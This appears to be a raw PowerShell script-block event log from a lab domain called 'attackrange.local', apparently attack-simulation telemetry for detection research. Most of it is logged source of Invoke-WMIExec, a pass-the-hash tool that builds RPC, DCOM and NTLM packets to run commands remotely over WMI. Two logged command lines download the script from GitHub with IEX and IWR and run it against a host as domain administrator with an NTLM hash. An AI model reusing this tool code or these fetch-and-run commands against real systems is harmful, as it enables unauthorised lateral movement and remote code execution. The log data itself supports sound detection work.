$packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierChecksum",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierSequenceNumber",$packet_sequence_number) return $packet_NTLMSSPVerifier } function New-PacketDCOMRemQueryInterface { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IID) $packet_DCOMRemQueryInterface = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemQueryInterface.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemQueryInterface.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemQueryInterface.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemQueryInterface.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IPID",$packet_IPID) $packet_DCOMRemQueryInterface.Add("Refs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IIDs",[Byte[]](0x01,0x00)) $packet_DCOMRemQueryInterface.Add("Unknown",[Byte[]](0x00,0x00,0x01,0x00,0x00,0x00)) $packet_DCOMRemQueryInterface.Add("IID",$packet_IID) return $packet_DCOMRemQueryInterface } function New-PacketDCOMRemRelease { param([Byte[]]$packet_causality_ID,[Byte[]]$packet_IPID,[Byte[]]$packet_IPID2) $packet_DCOMRemRelease = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemRelease.Add("VersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemRelease.Add("VersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemRelease.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Reserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("CausalityID",$packet_causality_ID) $packet_DCOMRemRelease.Add("Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("Unknown",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("InterfaceRefs",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("IPID",$packet_IPID) $packet_DCOMRemRelease.Add("PublicRefs",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("PrivateRefs",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("IPID2",$packet_IPID2) $packet_DCOMRemRelease.Add("PublicRefs2",[Byte[]](0x05,0x00,0x00,0x00)) $packet_DCOMRemRelease.Add("PrivateRefs2",[Byte[]](0x00,0x00,0x00,0x00)) return $packet_DCOMRemRelease } function New-PacketDCOMRemoteCreateInstance { param([Byte[]]$packet_causality_ID,[String]$packet_target) [Byte[]]$packet_target_unicode = [System.Text.Encoding]::Unicode.GetBytes($packet_target) [Byte[]]$packet_target_length = [System.BitConverter]::GetBytes($packet_target.Length + 1) $packet_target_unicode += ,0x00 * (([Math]::Truncate($packet_target_unicode.Length / 8 + 1) * 8) - $packet_target_unicode.Length) [Byte[]]$packet_cntdata = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 720) [Byte[]]$packet_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 680) [Byte[]]$packet_total_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 664) [Byte[]]$packet_private_header = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 40) + 0x00,0x00,0x00,0x00 [Byte[]]$packet_property_data_size = [System.BitConverter]::GetBytes($packet_target_unicode.Length + 56) $packet_DCOMRemoteCreateInstance = New-Object System.Collections.Specialized.OrderedDictionary $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMajor",[Byte[]](0x05,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMVersionMinor",[Byte[]](0x07,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMFlags",[Byte[]](0x01,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMReserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("DCOMCausalityID",$packet_causality_ID) $packet_DCOMRemoteCreateInstance.Add("Unknown",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown2",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown3",[Byte[]](0x00,0x00,0x02,0x00)) $packet_DCOMRemoteCreateInstance.Add("Unknown4",$packet_cntdata) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCntData",$packet_cntdata) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFSignature",[Byte[]](0x4d,0x45,0x4f,0x57)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFFlags",[Byte[]](0x04,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesOBJREFIID",[Byte[]](0xa2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFCLSID",[Byte[]](0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFCBExtension",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFSize",$packet_size) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesTotalSize",$packet_total_size) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesReserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCommonHeader",[Byte[]](0x01,0x10,0x08,0x00,0xcc,0xcc,0xcc,0xcc)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderPrivateHeader",[Byte[]](0xb0,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderTotalSize",$packet_total_size) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderCustomHeaderSize",[Byte[]](0xc0,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesCustomHeaderReserved",[Byte[]](0x00,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesDestinationContext",[Byte[]](0x02,0x00,0x00,0x00)) $packet_DCOMRemoteCreateInstance.Add("IActPropertiesCUSTOMOBJREFIActPropertiesNumActivationPropertyStructs",[Byte[]](0x06,0x00,0x00,0x00)) 1dcb5e95-9bfe-41e2-83fe-63deb6bdb4e6 4104152150x0719842Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.14 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}dadb0a4e-593f-447e-b774-cb28f3e413a6 4104152150x0719840Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target 10.0.1.14 -Username attackrange.local\administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}c8de8214-3d89-404f-bf2a-ceb907804a2c 4104132150x0719352Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local17function Invoke-WMIExec { <# .SYNOPSIS Invoke-WMIExec performs WMI command execution on targets using NTLMv2 pass the hash authentication. Author: Kevin Robertson (@kevin_robertson) License: BSD 3-Clause .PARAMETER Target Hostname or IP address of target. .PARAMETER Username Username to use for authentication. .PARAMETER Domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username. .PARAMETER Hash NTLM password hash for authentication. This module will accept either LM:NTLM or NTLM format. .PARAMETER Command Command to execute on the target. If a command is not specified, the function will just check to see if the username and hash has access to WMI on the target. .PARAMETER Sleep Default = 10 Milliseconds: Sets the function's Start-Sleep values in milliseconds. You can try tweaking this setting if you are experiencing strange results. .EXAMPLE Execute a command. Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose .EXAMPLE Check command execution privilege. Invoke-WMIExec -Target 192.168.100.20 -Username administrator -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 .LINK https://github.com/Kevin-Robertson/Invoke-TheHash #> [CmdletBinding()] param ( [parameter(Mandatory=$true)][String]$Target, [parameter(Mandatory=$true)][String]$Username, [parameter(Mandatory=$false)][String]$Domain, [parameter(Mandatory=$false)][String]$Command, [parameter(Mandatory=$true)][ValidateScript({$_.Length -eq 32 -or $_.Length -eq 65})][String]$Hash, [parameter(Mandatory=$false)][Int]$Sleep=10 ) if($Command) { $WMI_execute = $true } function ConvertFrom-PacketOrderedDictionary { param($packet_ordered_dictionary) ForEach($field in $packet_ordered_dictionary.Values) { $byte_array += $field } return $byte_array } #RPC function New-PacketRPCBind { param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCBind.Add("Version",[Byte[]](0x05)) $packet_RPCBind.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCBind.Add("PacketType",[Byte[]](0x0b)) $packet_RPCBind.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCBind.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCBind.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCBind.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("CallID",$packet_call_ID_bytes) $packet_RPCBind.Add("MaxXmitFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("MaxRecvFrag",[Byte[]](0xb8,0x10)) $packet_RPCBind.Add("AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("NumCtxItems",$packet_num_ctx_items) $packet_RPCBind.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID",$packet_context_ID) $packet_RPCBind.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown2",[Byte[]](0x00)) $packet_RPCBind.Add("Interface",$packet_UUID) $packet_RPCBind.Add("InterfaceVer",$packet_UUID_version) $packet_RPCBind.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCBind.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) if($packet_num_ctx_items[0] -eq 2) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) } elseif($packet_num_ctx_items[0] -eq 3) { $packet_RPCBind.Add("ContextID2",[Byte[]](0x01,0x00)) $packet_RPCBind.Add("NumTransItems2",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown3",[Byte[]](0x00)) $packet_RPCBind.Add("Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x04 } elseif($packet_auth_padding -eq 8) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x08 } elseif($packet_auth_padding -eq 12) { $packet_NTLMSSPVerifier.Add("AuthPadding",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) [Byte[]]$packet_auth_pad_length = 0x0c } else { [Byte[]]$packet_auth_pad_length = 0x00 } $packet_NTLMSSPVerifier.Add("AuthType",[Byte[]](0x0a)) $packet_NTLMSSPVerifier.Add("AuthLevel",$packet_auth_level) $packet_NTLMSSPVerifier.Add("AuthPadLen",$packet_auth_pad_length) $packet_NTLMSSPVerifier.Add("AuthReserved",[Byte[]](0x00)) $packet_NTLMSSPVerifier.Add("AuthContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_NTLMSSPVerifier.Add("NTLMSSPVerifierVersionNumber",[Byte[]](0x01,0x00,0x00,0x00)) 